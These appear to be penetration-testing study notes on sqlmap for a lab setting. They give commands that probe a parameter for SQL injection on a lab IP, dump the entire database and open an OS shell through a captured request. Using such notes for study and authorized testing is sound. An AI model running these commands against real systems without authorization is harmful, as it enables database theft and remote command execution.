SQLmap [Not Allowed in OSCP]

Although sqlmap is a great tool to automate SQLi attacks, it provides next-to-zero stealth. Due to its high-volume of traffic, sqlmap should not be used as a first choice tool during assignments that require staying under the radar.

Press enter to go with default option

we want to scan with -u and specify the parameter to test using -p:

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

after confirming that it is vulnerable to SQLi we can also dump entire database using --dump

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

Way of getting OS Shell

capture and save packet first (right click and select copy to file)

sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"

WPScan is used for wordpress web scanning for vulnerability

https://www.kali.org/tools/wpscan/

PreviousPayload for RCE NextWord Press

Last updated 11 months ago